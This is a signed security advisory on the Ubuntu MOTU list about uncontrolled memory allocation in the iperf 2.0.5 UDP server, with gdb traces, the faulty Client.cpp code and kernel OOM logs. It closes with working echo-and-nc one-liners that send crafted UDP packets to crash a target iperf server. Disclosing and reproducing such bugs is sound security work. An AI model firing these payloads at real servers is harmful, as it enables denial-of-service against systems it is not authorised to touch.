-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CWE-789[http://cwe.mitre.org/data/definitions/789.html]: Uncontrolled Memory Allocation in iperf 2.0.5 UDP Server Mode
$ gdb src/iperf GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1 Copyright (C) 2014 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from src/iperf...(no debugging symbols found)...done. (gdb) run -s -u Starting program: iperf-2.0.5/src/iperf -s -u [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". [New Thread 0x7ffff6fd5700 (LWP 13968)] [New Thread 0x7ffff67d4700 (LWP 13969)] - ------------------------------------------------------------ Server listening on UDP port 5001 Receiving 1470 byte datagrams UDP buffer size: 208 KByte (default) - ------------------------------------------------------------ [New Thread 0x7ffff5fd3700 (LWP 13970)] [ 3] local 10.0.0.26 port 5001 connected with 10.0.0.183 port 5001 [ ID] Interval Transfer Bandwidth Jitter Lost/Total Datagrams [ 3] 0.0- 1.0 sec 67.0 Bytes 536 bits/sec 0.000 ms 5592405/5592406 (1e+02%) [New Thread 0x7ffff57d2700 (LWP 13971)] terminate called after throwing an instance of 'std::bad_alloc' what(): std::bad_alloc [Thread 0x7ffff5fd3700 (LWP 13970) exited] Program received signal SIGABRT, Aborted. [Switching to Thread 0x7ffff57d2700 (LWP 13971)] 0x00007ffff7312bb9 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt #0 0x00007ffff7312bb9 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 #1 0x00007ffff7315fc8 in __GI_abort () at abort.c:89 #2 0x00007ffff7b366b5 in __gnu_cxx::__verbose_terminate_handler() () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #3 0x00007ffff7b34836 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #4 0x00007ffff7b34863 in std::terminate() () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #5 0x00007ffff7b34aa2 in __cxa_throw () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #6 0x00007ffff7b34f8d in operator new(unsigned long) () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #7 0x00007ffff7b35029 in operator new[](unsigned long) () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #8 0x0000000000402716 in Client::Client(thread_Settings*) () #9 0x0000000000403191 in client_spawn () #10 0x000000000040a98d in thread_run_wrapper () #11 0x00007ffff76aa182 in start_thread (arg=0x7ffff57d2700) at pthread_create.c:312 #12 0x00007ffff73d6fbd in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:111 (gdb) quit A debugging session is active. Inferior 1 [process 13964] will be killed. Quit anyway? (y or n) y martem@bluelabel:~/iperf/iperf-2.0.5$ Offending code Client.cpp line 74: * Store server hostname, optionally local hostname, and socket info. * ------------------------------------------------------------------- */ Client::Client( thread_Settings *inSettings ) { mSettings = inSettings; mBuf = NULL; // initialize buffer mBuf = new char[ mSettings->mBufLen ]; ... Somehow mSettings->mBufLen is taken directly from network. Easier way is to std:bad alloc crash [New Thread 0x7ffff5fd3700 (LWP 13970)] [ 3] local 10.0.0.26 port 5001 connected with 10.0.0.183 port 5001 [ ID] Interval Transfer Bandwidth Jitter Lost/Total Datagrams [ 3] 0.0- 1.0 sec 67.0 Bytes 536 bits/sec 0.000 ms 5592405/5592406 (1e+02%) [New Thread 0x7ffff57d2700 (LWP 13971)] terminate called after throwing an instance of 'std::bad_alloc' what(): std::bad_alloc [Thread 0x7ffff5fd3700 (LWP 13970) exited] Program received signal SIGABRT, Aborted. [Switching to Thread 0x7ffff57d2700 (LWP 13971)] 0x00007ffff7312bb9 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt If there is enough memory: - ------------------------------------------------------------ Client connecting to 10.0.0.183, UDP port 43690 Sending 65535 byte datagrams UDP buffer size: 208 KByte (default) - ------------------------------------------------------------ [ 3] local 10.0.0.26 port 42190 connected with 10.0.0.183 port 43690 ^C Program received signal SIGINT, Interrupt. pthread_cond_wait@@GLIBC_2.3.2 () at ../nptl/sysdeps/unix/sysv/linux/x86_64/pthread_cond_wait.S:185 185 ../nptl/sysdeps/unix/sysv/linux/x86_64/pthread_cond_wait.S: No such file or directory. (gdb) bt And if there isn't enough: [Thread 0x7ffff67d4700 (LWP 14067) exited] [Thread 0x7ffff6fd5700 (LWP 14066) exited] Program terminated with signal SIGKILL, Killed. The program no longer exists. (gdb) bt No stack. syslog: Nov 28 15:14:21 bluelabel kernel: [84274.801764] iperf invoked oom-killer: gfp_mask=0x280da, order=0, oom_score_adj=0 Nov 28 15:14:21 bluelabel kernel: [84274.801772] iperf cpuset=/ mems_allowed=0 Nov 28 15:14:21 bluelabel kernel: [84274.801777] CPU: 0 PID: 14261 Comm: iperf Tainted: G OX 3.13.0-40-generic #69-Ubuntu Nov 28 15:14:21 bluelabel kernel: [84274.801780] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006 Nov 28 15:14:21 bluelabel kernel: [84274.801783] 0000000000000000 ffff8800361fda80 ffffffff8171f226 ffff880036140000 Nov 28 15:14:21 bluelabel kernel: [84274.801788] ffff8800361fdb08 ffffffff81719ae1 0000000000000000 0000000000000000 Nov 28 15:14:21 bluelabel kernel: [84274.801791] 0000000000000000 0000000000000000 0000000000000000 0000000000000000 Nov 28 15:14:21 bluelabel kernel: [84274.801794] Call Trace: Nov 28 15:14:21 bluelabel kernel: [84274.801804] [<ffffffff8171f226>] dump_stack+0x45/0x56 Nov 28 15:14:21 bluelabel kernel: [84274.801810] [<ffffffff81719ae1>] dump_header+0x7f/0x1f1 Nov 28 15:14:21 bluelabel kernel: [84274.801816] [<ffffffff8115255e>] oom_kill_process+0x1ce/0x330 Nov 28 15:14:21 bluelabel kernel: [84274.801822] [<ffffffff812d5715>] ? security_capable_noaudit+0x15/0x20 Nov 28 15:14:21 bluelabel kernel: [84274.801827] [<ffffffff81152c94>] out_of_memory+0x414/0x450 Nov 28 15:14:21 bluelabel kernel: [84274.801832] [<ffffffff81158ffb>] __alloc_pages_nodemask+0xa5b/0xb80 Nov 28 15:14:21 bluelabel kernel: [84274.801837] [<ffffffff811997ba>] alloc_pages_vma+0x9a/0x140 Nov 28 15:14:21 bluelabel kernel: [84274.801843] [<ffffffff8117a103>] handle_mm_fault+0xb23/0xf00 Nov 28 15:14:21 bluelabel kernel: [84274.801848] [<ffffffff8172b2a4>] __do_page_fault+0x184/0x560 Nov 28 15:14:21 bluelabel kernel: [84274.801853] [<ffffffff81182215>] ? change_protection+0x65/0xb0 Nov 28 15:14:21 bluelabel kernel: [84274.801857] [<ffffffff811823b1>] ? mprotect_fixup+0x151/0x290 Nov 28 15:14:21 bluelabel kernel: [84274.801862] [<ffffffff8172b69a>] do_page_fault+0x1a/0x70 Nov 28 15:14:21 bluelabel kernel: [84274.801866] [<ffffffff81727b08>] page_fault+0x28/0x30 Nov 28 15:14:21 bluelabel kernel: [84274.801868] Mem-Info: Nov 28 15:14:21 bluelabel kernel: [84274.801871] Node 0 DMA per-cpu: Nov 28 15:14:21 bluelabel kernel: [84274.801879] CPU 0: hi: 0, btch: 1 usd: 0 Nov 28 15:14:21 bluelabel kernel: [84274.801882] CPU 1: hi: 0, btch: 1 usd: 0 Nov 28 15:14:21 bluelabel kernel: [84274.801884] CPU 2: hi: 0, btch: 1 usd: 0 Nov 28 15:14:21 bluelabel kernel: [84274.801886] CPU 3: hi: 0, btch: 1 usd: 0 Nov 28 15:14:21 bluelabel kernel: [84274.801889] Node 0 DMA32 per-cpu: Nov 28 15:14:21 bluelabel kernel: [84274.801891] CPU 0: hi: 186, btch: 31 usd: 57 Nov 28 15:14:21 bluelabel kernel: [84274.801894] CPU 1: hi: 186, On FreeBSD you would get a blunt message "out of swap" or something. Reproducing the problems: # oom killer on kubuntu echo -e -n "\x2a\x8e\x10\x4f\x7d\x0e\xe3\x57\xc9\x93\x1b\x91\xac\x1d\xed\x3d\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f" | nc target-ip 5001 -u -q 1 # bad alloc echo -e -n "\x00\x00\x00\x01\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x7f\xff\xff\xff\xaa\xaa\xaa\xae\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa" | nc target-ip 5001 -p 5001 -u -q 1 echo -e -n "\x80\x00\x00\x01\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x7f\xff\xff\xff\xaa\xaa\xaa\xae\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa" | nc target-ip 5001 -p 5001 -u -q 1 7fffffff is the allocation size - -- Aivar Liimets -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBAgAGBQJUjqB6AAoJELaD12NxHpo9LzsP/0GDhK2Yi8tXOCCdBmMnoBe7 kpfN38USlYCcbFLlxgc0B/qTgAsoq3EBfhUWBpY1t65HkzJ0IBVTphNsHJoLh3Oq szurvUCs5sklJn1yne6cq5eYaFJfOenOu711byg237pfkjUG92FtUOUXWiP5mUa/ iE1edFsqCbfK0xfY3nWEKQw+HSPSJbPJ1Vfqj7Dx/daCkv5RFNb3lBvE5Yu7e/88 h0FEDsbt408mE/DyG5pTSoeFYZLIJN5LJCX4s7tmqeQDvHQRa655REOSNjh0jNCq lFnkHF0qliXwXdsPN3MgGc+5qxK+pm8W00OO0SGIo6rgt+t9mCWaUilVuDGnTeD6 6qYeALTdl6qYFmtCb8Mfb+untlTEWUR8p7sfyVblzRsyBNaXodcJZ0cPU7Wrfi2I UXg/HFYLKgmbwOuC/SJMDHAPqDKyZ0V6qj6SoHrgLdFZkOU02qwnigFPNDbcGeIn fYWFM6HA3pUHUdfavooeBnRatVgOSvR8DzZulo82qzWMlcf9Nw+ggFzwJgxFJSW5 rJImpQyTkKyhSrCtEcS257e0nWlBuWQICobT5vwJl3gf7DbicMmfIecTdMLXtAor diCdMPSBMqB/bwYZlkjerqd1XO9qUbKixvOkauqcGu/galVH2X75IIZSsQQoO0Ce 8j5ybbtHzzMAb7Rq/bt9 =pBH+ -----END PGP SIGNATURE----- -- Ubuntu-motu mailing list [email protected] Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-motu
